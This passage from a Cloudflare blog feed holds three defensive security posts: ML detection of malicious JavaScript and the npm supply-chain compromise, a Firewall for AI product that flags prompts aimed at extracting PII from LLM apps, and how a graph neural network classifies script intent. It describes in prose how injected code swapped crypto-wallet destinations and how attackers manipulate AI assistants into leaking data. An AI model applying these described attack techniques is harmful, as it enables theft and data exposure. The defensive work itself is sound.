      <a href="#finding-needles-in-a-3-5-billion-script-haystack">
        
      </a>
    </div>
    <p>Everyday, Cloudflare Page Shield assesses 3.5 billion scripts per day or 40,000 scripts per second. Of these, less than 0.3% are malicious, based on our machine learning (ML)-based malicious script detection. As explained in a prior <a href="https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/#ai-inference-at-scale"><u>blog post</u></a>, we preprocess JavaScript code into an <a href="https://en.wikipedia.org/wiki/Abstract_syntax_tree"><u>Abstract Syntax Tree</u></a> to train a <a href="https://mbernste.github.io/posts/gcn/"><u>message-passing graph convolutional network (MPGCN)</u></a> that classifies a given JavaScript file as either malicious or benign. </p><p>The intuition behind using a graph-based model is to use both the structure (e.g. function calling, assertions) and code text to learn hacker patterns. For example, in the npm compromise, the <a href="https://www.aikido.dev/blog/npm-debug-and-chalk-packages-compromised"><u>malicious code</u></a> injected in compromised packages uses code obfuscation and also modifies code entry points for crypto wallet interfaces, such as Ethereum’s window.ethereum, to swap payment destinations to accounts in the attacker’s control. Crucially, rather than engineering such behaviors as features, the model learns to distinguish between good and bad code purely from structure and syntax. As a result, it is resilient to techniques used not just in the npm compromise but also future compromise techniques. </p><p>Our ML model outputs the probability that a script is malicious which is then transformed into a score ranging from 1 to 99, with low scores indicating likely malicious and high scores indicating benign scripts. Importantly, like many Cloudflare ML models, inferencing happens in under 0.3 seconds. </p>
    <div>
      <h2>Model Evaluation</h2>
      <a href="#model-evaluation">
        
      </a>
    </div>
    <p>Since the initial launch, our JavaScript classifiers are constantly being evolved to optimize model evaluation metrics, in this case, <a href="https://en.wikipedia.org/wiki/Precision_and_recall"><u>F1 measure</u></a>. Our current metrics are </p><table><tr><th><p><b>Metric</b></p></th><th><p><b>Latest: Version 2.7</b></p></th><th><p><b>Improvement over prior version</b></p></th></tr><tr><td><p>Precision</p></td><td><p>98%</p></td><td><p>5%</p></td></tr><tr><td><p>Recall</p></td><td><p>90%</p></td><td><p>233%</p></td></tr><tr><td><p>F1</p></td><td><p>94%</p></td><td><p>123%</p></td></tr></table><p>Some of the improvements were accomplished through:</p><ul><li><p>More training examples, curated from a combination of open source datasets, security partners, and labeling of Cloudflare traffic</p></li><li><p>Better training examples, for instance, by removing samples with pure comments in them or scripts with nearly equal structure</p></li><li><p>Better training set stratification, so that training, validation and test sets all have similar distribution of classes of interest</p></li><li><p>Tweaking the evaluation criteria to maximize recall with 99% precision</p></li></ul><p>Given the confusion matrix, we should expect about 2 false positives per second, if we assume ~0.3% of the 40,000 scripts per second are flagged as malicious. We employ multiple LLMs alongside expert human security analysts to review such scripts around the clock. Most False Positives we encounter in this way are rather challenging. For example, scripts that read all form inputs except credit card numbers (e.g. reject input values that test true using the <a href="https://en.wikipedia.org/wiki/Luhn_algorithm"><u>Luhn algorithm</u></a>), injecting dynamic scripts, heavy user tracking, heavy deobfuscation, etc. User tracking scripts often exhibit a combination of these behaviors, and the only reliable way to distinguish truly malicious payloads is by assessing the trustworthiness of their connected domains. We feed all newly labeled scripts back into our ML training (&amp; testing) pipeline.</p><p>Most importantly, we verified that Cloudflare Page Shield would have successfully detected all 18 compromised npm packages as malicious (a novel attack, thus, not in the training data)..</p>
    <div>
      <h2>Planned improvements</h2>
      <a href="#planned-improvements">
        
      </a>
    </div>
    <p>Static script analysis has proven effective and is sometimes the only viable approach (e.g., for npm packages). To address more challenging cases, we are enhancing our ML signals with contextual data including script URLs, page hosts, and connected domains. Modern Agentic AI approaches can wrap JavaScript runtimes as tools in an overall AI workflow. Then, they can enable a hybrid approach that combines static and dynamic analysis techniques to tackle challenging false positive scenarios, such as user tracking scripts.</p>
    <div>
      <h3>Consolidating classifiers</h3>
      <a href="#consolidating-classifiers">
        
      </a>
    </div>
    <p><a href="https://blog.cloudflare.com/detecting-magecart-style-attacks-for-pageshield/"><u>Over 3 years ago</u></a> we launched our classifier, “<a href="https://developers.cloudflare.com/page-shield/detection/review-malicious-scripts/#review-malicious-scripts"><u>Code Behaviour Analysis</u></a>” for Magecart-style scripts that learns  code obfuscation and data exfiltration behaviors. Subsequently, we also deployed our <a href="https://mbernste.github.io/posts/gcn/"><u>message-passing graph convolutional network (MPGCN)</u></a> based approach that can also classify <a href="https://blog.cloudflare.com/navigating-the-maze-of-magecart/"><u>Magecart attacks</u></a>. Given the efficacy of the MPGCN-based malicious code analysis, we are announcing the end-of-life of <a href="https://developers.cloudflare.com/page-shield/detection/review-malicious-scripts/#review-malicious-scripts"><u>code behaviour analysis</u></a> by the end of 2025. </p>
    <div>
      <h2>Staying safe always</h2>
      <a href="#staying-safe-always">
        
      </a>
    </div>
    <p>In the npm attack, we did not see any activity in the Cloudflare network related to this compromise among Page Shield users, though for other exploits, we catch its traffic within minutes. In this case, patches of the compromised npm packages were released in 2 hours or less, and given that the infected payloads had to be built into end user facing applications for end user impact, we suspect that our customers dodged the proverbial bullet. That said, had traffic gotten through, Page Shield was already equipped to detect and block this threat.</p><p>Also make sure to consult our <a href="https://developers.cloudflare.com/page-shield/how-it-works/malicious-script-detection/#malicious-script-detection"><u>Page Shield Script detection</u></a> to find malicious packages. Consult the Connections tab within Page Shield to view suspicious connections made by your applications.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6rMXJZVWEu6LkupOPY2pOB/0740a085fa2a64de3cff148fc29ad328/BLOG-3052_2.png" />
          </figure><p><sub><i>Several scripts are marked as malicious. </i></sub></p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1oj2WALUAurKuu2XYTdKPm/fe8a564f10888e656c2510bc2a91dd6f/BLOG-3052_3.png" />
          </figure><p><sub><i>Several connections are marked as malicious. </i></sub></p><p>
And be sure to complete the following steps:</p><ol><li><p><b>Audit your dependency tree</b> for recently published versions (check package-lock.json / npm ls) and look for versions published around early–mid September 2025 of widely used packages. </p></li><li><p><b>Rotate any credentials</b> that may have been exposed to your build environment.</p></li><li><p><b>Revoke and reissue CI/CD tokens and service keys</b> that might have been used in build <a href="https://www.cloudflare.com/learning/serverless/glossary/what-is-ci-cd/">pipelines</a> (GitHub Actions, npm tokens, cloud credentials).</p></li><li><p><b>Pin dependencies</b> to known-good versions (or use lockfiles), and consider using a package allowlist / verified publisher features from your registry provider.</p></li><li><p><b>Scan build logs and repos for suspicious commits/GitHub Actions changes</b> and remove any unknown webhooks or workflows.</p></li></ol><p>While vigilance is key, automated defenses provide a crucial layer of protection against fast-moving supply chain attacks. Interested in better understanding your client-side supply chain? Sign up for our free, custom <a href="https://www.cloudflare.com/lp/client-side-risk-assessment/"><u>Client-Side Risk Assessment</u></a>.</p> ]]></content:encoded>
            <category><![CDATA[Supply Chain Attacks]]></category>
            <category><![CDATA[JavaScript]]></category>
            <category><![CDATA[Malicious JavaScript]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Developer Platform]]></category>
            <category><![CDATA[Developers]]></category>
            <guid isPermaLink="false">1DRrVAPmyZYyz2avWuwYZ4</guid>
            <dc:creator>Bashyam Anant</dc:creator>
            <dc:creator>Juan Miguel Cejuela</dc:creator>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Denzil Correa</dc:creator>
            <dc:creator>Israel Adura</dc:creator>
            <dc:creator>Georgie Yoxall</dc:creator>
        </item>
        <item>
            <title><![CDATA[Take control of public AI application security with Cloudflare's Firewall for AI]]></title>
            <link>https://blog.cloudflare.com/take-control-of-public-ai-application-security-with-cloudflare-firewall-for-ai/</link>
            <pubDate>Wed, 19 Mar 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Firewall for AI discovers and protects your public LLM-powered applications, and is seamlessly integrated with Cloudflare WAF. Join the beta now and take control of your generative AI security. ]]></description>
            <content:encoded><![CDATA[ <p>Imagine building an LLM-powered assistant trained on your developer documentation and some internal guides to quickly help customers, reduce support workload, and improve user experience. Sounds great, right? But what if sensitive data, such as employee details or internal discussions, is included in the data used to train the LLM? Attackers could manipulate the assistant into exposing sensitive data or exploit it for social engineering attacks, where they deceive individuals or systems into revealing confidential details, or use it for targeted phishing attacks. Suddenly, your helpful AI tool turns into a serious security liability. </p>
    <div>
      <h3>Introducing Firewall for AI: the easiest way to discover and protect LLM-powered apps</h3>
      <a href="#introducing-firewall-for-ai-the-easiest-way-to-discover-and-protect-llm-powered-apps">
        
      </a>
    </div>
    <p>Today, as part of Security Week 2025, we’re announcing the open beta of Firewall for AI, first <a href="https://blog.cloudflare.com/firewall-for-ai/"><u>introduced during Security Week 2024</u></a>. After talking with customers interested in protecting their LLM apps, this first beta release is focused on discovery and PII detection, and more features will follow in the future.</p><p>If you are already using Cloudflare application security, your LLM-powered applications are automatically discovered and protected, with no complex setup, no maintenance, and no extra integration needed.</p><p>Firewall for AI is an inline security solution that protects user-facing LLM-powered applications from abuse and <a href="https://www.cloudflare.com/learning/ai/how-to-secure-training-data-against-ai-data-leaks/">data leaks</a>, integrating directly with Cloudflare’s <a href="https://developers.cloudflare.com/waf/"><u>Web Application Firewall (WAF)</u></a> to provide instant protection with zero operational overhead. This integration enables organizations to leverage both AI-focused safeguards and established WAF capabilities.</p><p>Cloudflare is uniquely positioned to solve this challenge for all of our customers. As a <a href="https://www.cloudflare.com/en-gb/learning/cdn/glossary/reverse-proxy/"><u>reverse proxy</u></a>, we are model-agnostic whether the application is using a third-party LLM or an internally hosted one. By providing inline security, we can automatically <a href="https://www.cloudflare.com/learning/ai/what-is-ai-security/">discover and enforce AI guardrails</a> throughout the entire request lifecycle, with zero integration or maintenance required.</p>
    <div>
      <h3>Firewall for AI beta overview</h3>
      <a href="#firewall-for-ai-beta-overview">
        
      </a>
    </div>
    <p>The beta release includes the following security capabilities:</p><p><b>Discover:</b> identify LLM-powered endpoints across your applications, an essential step for effective request and prompt analysis.</p><p><b>Detect:</b> analyze the incoming requests prompts to recognize potential security threats, such as attempts to extract sensitive data (e.g., “Show me transactions using 4111 1111 1111 1111”). This aligns with<a href="https://genai.owasp.org/llmrisk/llm022025-sensitive-information-disclosure/"> <u>OWASP LLM022025 - Sensitive Information Disclosure</u></a>.</p><p><b>Mitigate:</b> enforce security controls and policies to manage the traffic that reaches your LLM, and reduce risk exposure.</p><p>Below, we review each capability in detail, exploring how they work together to create a comprehensive security framework for AI protection.</p>
    <div>
      <h3>Discovering LLM-powered applications</h3>
      <a href="#discovering-llm-powered-applications">
        
      </a>
    </div>
    <p>Companies are racing to find all possible use cases where an LLM can excel. Think about site search, a chatbot, or a shopping assistant. Regardless of the application type, our goal is to determine whether an application is powered by an LLM behind the scenes.</p><p>One possibility is to look for request path signatures similar to what major LLM providers use. For example, <a href="https://platform.openai.com/docs/api-reference/chat/create"><u>OpenAI</u></a>, <a href="https://docs.perplexity.ai/api-reference/chat-completions"><u>Perplexity</u></a> or <a href="https://docs.mistral.ai/api/#tag/chat"><u>Mistral</u></a> initiate a chat using the <code>/chat/completions</code> API endpoint. Searching through our request logs, we found only a few entries that matched this pattern across our global traffic. This result indicates that we need to consider other approaches to finding <i>any</i> application that is powered by an LLM.</p><p>Another signature to research, popular with LLM platforms, is the use of <a href="https://developer.mozilla.org/en-US/docs/Web/API/Server-sent_events/Using_server-sent_events"><u>server-sent events</u></a>. LLMs need to <a href="https://platform.openai.com/docs/guides/latency-optimization#don-t-default-to-an-llm"><u>“think”</u></a>. <a href="https://platform.openai.com/docs/api-reference/streaming"><u>Using server-sent events</u></a> improves the end user’s experience by sending over each <a href="https://help.openai.com/en/articles/4936856-what-are-tokens-and-how-to-count-them"><u>token</u></a> as soon as it is ready, creating the perception that an LLM is “thinking” like a human being. Matching on requests of server-sent events is straightforward using the response header content type of <code>text/event-stream</code>. This approach expands the coverage further, but does not yet cover the <a href="https://stackoverflow.blog/2022/06/02/a-beginners-guide-to-json-the-data-format-for-the-internet/"><u>majority of applications</u></a> that are using JSON format for data exchanges. Continuing the journey, our next focus is on the responses having header content type of <code>application/json</code>.</p><p>No matter how fast LLMs can be optimized to respond, when chatting with major LLMs, we often perceive them to be slow, as we have to wait for them to “think”. By plotting on how much time it takes for the origin server to respond over identified LLM endpoints (blue line) versus the rest (orange line), we can see in the left graph that origins serving LLM endpoints mostly need more than 1 second to respond, while the majority of the rest takes less than 1 second. Would we also see a clear distinction between origin server response body sizes, where the majority of LLM endpoints would respond with smaller sizes because major LLM providers <a href="https://platform.openai.com/docs/guides/safety-best-practices#constrain-user-input-and-limit-output-tokens"><u>limit output tokens</u></a>? Unfortunately not. The right graph shows that LLM response size largely overlaps with non-LLM traffic.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4CkowlKelGlYueNzSrbsGn/f8091d66a6c0eb8b884c7cc6f2a128ab/1.png" />
          </figure><p>By dividing origin response size over origin response duration to calculate an effective bitrate, the distinction is even clearer that 80% of LLM endpoints operate slower than 4 KB/s.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5sJKUnLmWwnTWzUOyWVRKO/c98c8fc32dbafa5d79f21effdfc58f34/2.png" />
          </figure><p>Validating this assumption by using bitrate as a heuristic across Cloudflare’s traffic, we found that roughly 3% of all origin server responses have a bitrate lower than 4 KB/s. Are these responses all powered by LLMs? Our gut feeling tells us that it is unlikely that 3% of origin responses are LLM-powered! </p><p>Among the paths found in the 3% of matching responses, there are few patterns that stand out: 1) GraphQL endpoints, 2) device heartbeat or health check, 3) generators (for QR codes, one time passwords, invoices, etc.). Noticing this gave us the idea to filter out endpoints that have a low variance of response size over time — for instance, invoice generation is mostly based on the same template, while conversations in the LLM context have a higher variance.</p><p>A combination of filtering out known false positive patterns and low variance in response size gives us a satisfying result. These matching endpoints, approximately 30,000 of them, labelled <code>cf-llm</code>, can now be found in API Shield or Web assets, depending on your dashboard’s version, for all customers. Now you can review your endpoints and decide how to best protect them.</p>
    <div>
      <h3>Detecting prompts designed to leak PII</h3>
      <a href="#detecting-prompts-designed-to-leak-pii">
        
      </a>
    </div>
    <p>There are multiple methods to detect PII in LLM prompts. A common method relies on <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Guide/Regular_expressions"><u>regular expressions (“regexes”)</u></a>, which is a method we have been using in the WAF for <a href="https://developers.cloudflare.com/waf/managed-rules/reference/sensitive-data-detection/"><u>Sensitive Data Detection</u></a> on the body of the HTTP response from the web server Regexes offer low latency, easy customization, and straightforward implementation. However, regexes alone have limitations when applied to LLM prompts. They require frequent updates to maintain accuracy, and may struggle with more complex or implicit PII, where the information is spread across text rather than a fixed format. </p><p>For example, regexes work well for structured data like credit card numbers and addresses, but struggle with PII is embedded in natural language. For instance, “I just booked a flight using my Chase card, ending in 1111” wouldn’t trigger a regex match as it lacks the expected pattern, even though it reveals a partial credit card number and financial institution.</p><p>To enhance detection, we rely on a <a href="https://www.ibm.com/think/topics/named-entity-recognition"><u>Named Entity Recognition (NER)</u></a> model, which adds a layer of intelligence to complement regex-based detection. NER models analyze text to identify contextual PII data types, such as names, phone numbers, email addresses, and credit card numbers, making detection more flexible and accurate. Cloudflare’s detection utilizes <a href="https://microsoft.github.io/presidio/"><u>Presidio</u></a>, an open-source PII detection framework, to further strengthen this approach.</p>
    <div>
      <h4>Using Workers AI to deploy Presidio</h4>
      <a href="#using-workers-ai-to-deploy-presidio">
        
      </a>
    </div>
    
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5ruqPkxJBgFCRdsoft1TO1/aa327b069569a0f952c8baea102955b8/3.png" />
          </figure><p>In our design, we leverage Cloudflare <a href="https://developers.cloudflare.com/workers-ai/"><u>Workers AI</u></a> as the fastest way to deploy <a href="https://microsoft.github.io/presidio/"><u>Presidio</u></a>. This integration allows us to process LLM app requests inline, ensuring that sensitive data is flagged before it reaches the model.</p><p>Here’s how it works:</p><p>When Firewall for AI is enabled on an application and an end user sends a request to an LLM-powered application, we pass the request to Cloudflare Workers AI which runs the request through Presidio’s NER-based detection model to identify any potential PII from the available <a href="https://microsoft.github.io/presidio/supported_entities/"><u>entities</u></a>. The output includes metadata like “Was PII found?” and “What type of PII entity?”. This output is then processed in our Firewall for AI module, and handed over to other systems, like <a href="https://developers.cloudflare.com/waf/analytics/security-analytics/"><u>Security Analytics</u></a> for visibility, and the rules like <a href="https://developers.cloudflare.com/waf/custom-rules/"><u>Custom rules</u></a> for enforcement. Custom rules allow customers to take appropriate actions on the requests based on the provided metadata. </p><p>If no terminating action, like blocking, is triggered, the request proceeds to the LLM. Otherwise, it gets blocked or the appropriate action is applied before reaching the origin.</p>
    <div>
      <h3>Integrating AI security into the WAF and Analytics</h3>
      <a href="#integrating-ai-security-into-the-waf-and-analytics">
        
      </a>
    </div>
    <p><a href="https://www.cloudflare.com/ai-security/">Securing AI interactions</a> shouldn't require complex integrations. Firewall for AI is seamlessly built into Cloudflare’s WAF, allowing customers to enforce security policies before prompts reach LLM endpoints. With this integration, there are <a href="https://developers.cloudflare.com/waf/detections/firewall-for-ai/#fields"><u>new fields available</u></a> in Custom and Rate limiting rules. The rules can be used to take immediate action, such as blocking or logging risky prompts in real time.</p><p>For example, security teams can filter LLM traffic to analyze requests containing PII-related prompts. Using Cloudflare’s WAF rules engine, they can create custom security policies tailored to their AI applications.</p><p>Here’s what a rule to block detected PII prompts looks like:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4cvlFU0sia6dZly2LZGG8l/670dbb1ad5068f0fd5d8f4afde9e9e02/4.png" />
          </figure><p>Alternatively, if an organization wants to allow certain PII categories, such as location data, they can create an exception rule:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/wYFkoQyHFoFNwHmKtaaG3/94c7ae78dbabacf5dd8583af9e8eb071/5.png" />
          </figure><p>In addition to the rules, users can gain visibility into LLM interactions, detect potential risks, and enforce security controls using <a href="https://developers.cloudflare.com/waf/analytics/security-analytics/"><u>Security Analytics</u></a> and <a href="https://developers.cloudflare.com/waf/analytics/security-events/"><u>Security Events</u></a>. You can find more details in our <a href="https://developers.cloudflare.com/waf/detections/firewall-for-ai/"><u>documentation</u></a>.</p>
    <div>
      <h3>What's next: token counting, guardrails, and beyond</h3>
      <a href="#whats-next-token-counting-guardrails-and-beyond">
        
      </a>
    </div>
    <p>Beyond PII detection and creating security rules, we’re developing additional capabilities to strengthen AI security for our customers. The next feature we’ll release is token counting, which analyzes prompt structure and length. Customers can use the token count field in Rate Limiting and WAF Custom rules to prevent their users from sending very long prompts, which can impact third party model bills, or allow users to abuse the models. This will be followed by using AI to detect and allow content moderation, which will provide more flexibility in building guardrails in the rules.</p><p>If you're an enterprise customer, join the Firewall for AI beta today! Contact your customer team to start monitoring traffic, building protection rules, and taking control of your LLM traffic.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[LLM]]></category>
            <category><![CDATA[Web Asset Discovery]]></category>
            <guid isPermaLink="false">5XoyHPSrtBH8pPvUJkOXMD</guid>
            <dc:creator>Radwa Radwan</dc:creator>
            <dc:creator>Zhiyuan Zheng</dc:creator>
        </item>
        <item>
            <title><![CDATA[How we train AI to uncover malicious JavaScript intent and make web surfing safer]]></title>
            <link>https://blog.cloudflare.com/how-we-train-ai-to-uncover-malicious-javascript-intent-and-make-web-surfing-safer/</link>
            <pubDate>Wed, 19 Mar 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Learn more about how Cloudflare developed an AI model to uncover malicious JavaScript intent using a Graph Neural Network, from pre-processing data to inferencing at scale.  ]]></description>
            <content:encoded><![CDATA[ <p>Modern websites <a href="https://blog.cloudflare.com/application-security-report-2024-update/#enterprise-applications-use-47-third-party-scripts-on-average"><u>rely heavily</u></a> on JavaScript. Leveraging third-party scripts accelerates web app development, enabling organizations to deploy new features faster without building everything from scratch. However, supply chain attacks targeting third-party JavaScript are no longer just a theoretical concern — they have become a reality, as <a href="https://blog.cloudflare.com/polyfill-io-now-available-on-cdnjs-reduce-your-supply-chain-risk/"><u>recent incidents</u></a> have shown. Given the vast number of scripts and the rapid pace of updates, manually reviewing each one is not a scalable security strategy.</p><p>Cloudflare provides automated client-side protection through <a href="https://developers.cloudflare.com/page-shield/"><u>Page Shield</u></a>. Until now, Page Shield could scan JavaScript dependencies on a web page, flagging obfuscated script content which also exfiltrates data. However, these are only indirect indicators of compromise or malicious intent. Our original approach didn’t provide clear insights into a script’s specific malicious objectives or the type of attack it was designed to execute.</p><p>Taking things a step further, we have developed a new AI model that allows us to detect the exact malicious intent behind each script. This intelligence is now integrated into Page Shield, available to all Page Shield <a href="https://developers.cloudflare.com/page-shield/#availability"><u>add-on</u></a> customers. We are starting with three key threat categories: <a href="https://en.wikipedia.org/wiki/Web_skimming"><u>Magecart</u></a>, crypto mining, and malware.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6EefJpCcho3DIjbVbQIjuz/68852b905955065e48ec2aa4648621cd/1.png" />
          </figure><p><sup><i>Screenshot of Page Shield dashboard showing results of three types of analysis.</i></sup></p><p>With these improvements, Page Shield provides deeper visibility into client-side threats, empowering organizations to better protect their users from evolving security risks. This new capability is available to all Page Shield customers with the <a href="https://developers.cloudflare.com/page-shield/#availability"><u>add-on</u></a>. Head over <a href="https://dash.cloudflare.com/?to=/:account/:zone/security/page-shield"><u>to the dashboard</u></a>, and you can find the new malicious code analysis for each of the scripts monitored.</p><p>In the following sections, we take a deep dive into how we developed this model.</p>
    <div>
      <h3>Training the model to detect hidden malicious intent</h3>
      <a href="#training-the-model-to-detect-hidden-malicious-intent">
        
      </a>
    </div>
    <p>We built this new Page Shield AI model to detect the intent of JavaScript threats at scale. Training such a model for JavaScript comes with unique challenges, including dealing with web code written in many different styles, often obfuscated yet benign. For instance, the following three snippets serve the same function.</p>
            <pre><code>//Readable, plain code
function sayHi(name) {
  console.log(
    `Hello ${
      name ?? 
      "World" //default
    }!`
  );
}
sayHi("Internet");

//Minified
function sayHi(l){console.log(`Hello ${l??"World"}!`)}sayHi("Internet");

//Obfuscated
var h=Q;(function(V,A){var J=Q,p=V();while(!![]){try{var b=-parseInt(J('0x79'))/0x1*(-parseInt(J('0x6e'))/0x2)+-parseInt(J('0x80'))/0x3+parseInt(J('0x76'))/0x4*(-parseInt(J('0x72'))/0x5)+parseInt(J('0x6a'))/0x6+parseInt(J('0x84'))/0x7+-parseInt(J('0x6d'))/0x8*(-parseInt(J('0x7d'))/0x9)+parseInt(J('0x73'))/0xa*(-parseInt(J('0x7c'))/0xb);if(b===A)break;else p['push'](p['shift']());}catch(U){p['push'](p['shift']());}}}(S,0x22097));function sayHi(p){var Y=Q,b=(function(){var W=!![];return function(e,x){var B=W?function(){var m=Q;if(x){var G=x[m('0x71')](e,arguments);return x=null,G;}}:function(){};return W=![],B;};}()),U=b(this,function(){var s=Q,W=typeof window!==s('0x6b')?window:typeof process===s('0x6c')&amp;&amp;typeof require===s('0x7b')&amp;&amp;typeof global==='object'?global:this,e=W['console']=W['console']||{},x=[s('0x78'),s('0x70'),'info',s('0x69'),s('0x77'),'table',s('0x7f')];for(var B=0x0;B&lt;x[s('0x83')];B++){var G=b[s('0x75')][s('0x6f')][s('0x74')](b),t=x[B],X=e[t]||G;G['__proto__']=b[s('0x74')](b),G['toString']=X[s('0x7e')]['bind'](X),e[t]=G;}});U(),console['log'](Y('0x81')+(p??Y('0x7a'))+'!');}sayHi(h('0x82'));function Q(V,A){var p=S();return Q=function(b,U){b=b-0x69;var W=p[b];return W;},Q(V,A);}function S(){var v=['Internet','length','77966Hcxgji','error','1078032RtaGFM','undefined','object','8zrzBEk','244xEPFaR','prototype','warn','apply','10LQgYRU','400TNVOzq','bind','constructor','146612cfnkCX','exception','log','1513TBJIGL','World','function','57541MkoqrR','2362383dtBFrf','toString','trace','647766YvOJOm','Hello\x20'];S=function(){return v;};return S();}</code></pre>
            <p>With such a variance of styles (and many more), our machine learning solution needs to balance precision (low false positive rate), recall (don’t miss an attack vector), and speed. Here’s how we do it:</p>
    <div>
      <h4>Using syntax trees to classify malicious code</h4>
      <a href="#using-syntax-trees-to-classify-malicious-code">
        
      </a>
    </div>
    <p>JavaScript files are parsed into <a href="https://en.wikipedia.org/wiki/Tree_(graph_theory)"><u>syntax trees (connected acyclic graphs)</u></a>. These serve as the input to a <a href="https://en.wikipedia.org/wiki/Graph_neural_network"><u>Graph Neural Network (GNN)</u></a>. GNNs are used because they effectively capture the interdependencies (relationships between nodes) in executing code, such as a function calling another function. This contrasts with treating the code as merely a sequence of words — something a code compiler, incidentally, does not do. Another motivation to use GNNs is the <a href="https://dl.acm.org/doi/10.1007/978-3-030-92270-2_57"><u>insight</u></a> that the syntax trees of malicious versus benign JavaScript tend to be different. For example, it’s not rare to find attacks that consist of malicious snippets inserted into, but otherwise isolated from, the rest of a benign base code.</p><p>To parse the files, the <a href="https://tree-sitter.github.io/"><u>tree-sitter library</u></a> was chosen for its speed. One peculiarity of this parser, specialized for text editors, is that it parses out <a href="https://en.wikipedia.org/wiki/Parse_tree"><u>concrete syntax trees (CST)</u></a>. CSTs retain everything from the original text input, including spacing information, comments, and even nodes attempting to repair syntax errors. This differs from <a href="https://en.wikipedia.org/wiki/Abstract_syntax_tree"><u>abstract syntax trees (AST)</u></a>, the data structures used in compilers, which have just the essential information to execute the underlying code while ignoring the rest. One key reason for wanting to convert the CST to an AST-like structure, is that it reduces the tree size, which in turn reduces computation and memory usage. To do that, we abstract and filter out unnecessary nodes such as code comments. Consider for instance, how the following snippet</p>
            <pre><code>x = `result: ${(10+5) *   3}`;;; //this is a comment</code></pre>
            <p>… gets converted to an AST-like representation:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4KweWZ4yIzOTiIcYqHC682/56c059b38ad46949e7285d84438be4c9/2.png" />
          </figure><p><sup><i>Abstract Syntax Tree (AST) representation of the sample code above. Unnecessary elements get removed (e.g. comments, spacing) whereas others get encoded in the tree structure (order of operations due to parentheses).</i></sup></p><p>One benefit of working with parsed syntax trees is that <a href="https://huggingface.co/learn/nlp-course/en/chapter2/4"><u>tokenization</u></a> comes for free! We collect and treat the node leaves’ text as our tokens, which will be used as features (inputs) for the machine learning model. Note that multiple characters in the original input, for instance backticks to form a template string, are not treated as tokens per se, but remain encoded in the graph structure given to the GNN. (Notice in the sample tree representations the different node types, such as “assignment_expression”). Moreover, some details in the exact text input become irrelevant in the executing AST, such as whether a string was originally written using double quotes vs. single quotes.</p><p>We encode the node tokens and node types into a matrix of counts. Currently, we lowercase the nodes' text to reduce vocabulary size, improving efficiency and reducing sparsity. Note that JavaScript is a case-sensitive language, so this is a trade-off we continue to explore. This matrix and, importantly, the information about the node edges within the tree, is the input to the GNN.</p><p>How do we deal with obfuscated code? We don’t treat it specially. Rather, we always parse the JavaScript text as is, which incidentally unescapes <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Regular_expressions/Character_escape"><u>escape characters</u></a> too. For instance, the resulting AST shown below for the following input exemplifies that:</p>
            <pre><code>atob('\x55\x32\x56\x75\x5a\x45\x52\x68\x64\x47\x45\x3d') == "SendData"</code></pre>
            
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/sV2qPtj8G30EFnW6rwCav/ef0a970e338e5610da08fa3ccbdeafcc/3.png" />
          </figure><p><sup><i>Abstract Syntax Tree (AST) representation of the sample code above. JavaScript escape characters are unescaped.</i></sup></p><p>Moreover, our vocabulary contains several tokens that are commonly used in obfuscated code, such as double escaped hexadecimal-encoded characters. That, together with the graph structure information, is giving us satisfying results — the model successfully classifies malicious code whether it's obfuscated or not. Analogously, our model’s scores remain stable when applied to plain benign scripts compared to obfuscating them in different ways. In other words, the model’s score on a script is similar to the score on an obfuscated version of the same script. Having said that, some of our model's false positives (FPs) originate from benign but obfuscated code, so we continue to investigate how we can improve our model's intelligence.</p>
    <div>
      <h4>Architecting the Graph Neural Network</h4>
      <a href="#architecting-the-graph-neural-network">
        
      </a>
    </div>
    <p>We train a <a href="https://mbernste.github.io/posts/gcn/"><u>message-passing graph convolutional network (MPGCN)</u></a> that processes the input trees. The message-passing layers iteratively update each node’s internal representation, encoded in a matrix, by aggregating information from its neighbors (parent and child nodes in the tree). A pooling layer then condenses this matrix into a feature vector, discarding the explicit graph structure (edge connections between nodes). At this point, standard neural network layers, such as fully connected layers, can be applied to progressively refine the representation. Finally, a <a href="https://en.wikipedia.org/wiki/Softmax_function"><u>softmax activation</u></a> layer produces a probability distribution over the four possible classes: benign, magecart, cryptomining, and malware.</p><p>We use the <a href="https://github.com/tensorflow/gnn"><u>TF-GNN library</u></a> to implement graph neural networks, with <a href="https://keras.io/"><u>Keras</u></a> serving as the high-level frontend for model building and training. This works well for us with one exception: <a href="https://github.com/tensorflow/gnn/issues/803#issue-2279602052"><u>TF-GNN does not support sparse matrices / tensors</u></a>. (That lack of support increases memory consumption, which also adds some latency.) Because of this, we are considering switching to <a href="https://pytorch-geometric.readthedocs.io/"><u>PyTorch Geometric</u></a> instead.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/79SbvJgWq3mwMks6Vtxpgs/5ab55f19b6cf90dc070b5f0d70abdde9/4.png" />
